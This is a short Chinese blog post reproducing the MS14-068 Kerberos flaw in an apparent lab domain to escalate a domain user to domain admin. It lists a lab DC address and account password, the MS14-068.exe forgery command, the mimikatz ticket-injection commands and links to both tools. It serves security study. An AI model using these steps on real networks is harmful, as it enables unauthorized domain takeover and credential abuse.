[横向移动]ms14-068 复现

该漏洞允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。

DC 192.168.137.145
域账户 Add1 Admin@11

伪造证书

• 访问DC的c盘 被拒绝 ?! 呜呜呜 原来小小域账户竟是我自己

  

• 伪造

  MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
  

  

• mimikatz

  mimikatz # kerberos::purge          //清空当前凭证
  mimikatz # kerberos::list           //查看当前机器凭证
  mimikatz # kerberos::ptc 票据文件    //将上一步生成的票据注入到内存中
  

  票据文件 在MS14.068.exe的目录下

  

• 连接到DC

  

工具下载

mimikatz：https://github.com/gentilkiwi/mimikatz/
MS14-068：https://github.com/abatchy17/WindowsExploits

标签：068,kerberos,DC,mimikatz,复现,https,ms14
来源： https://www.cnblogs.com/Ky1226/p/14265159.html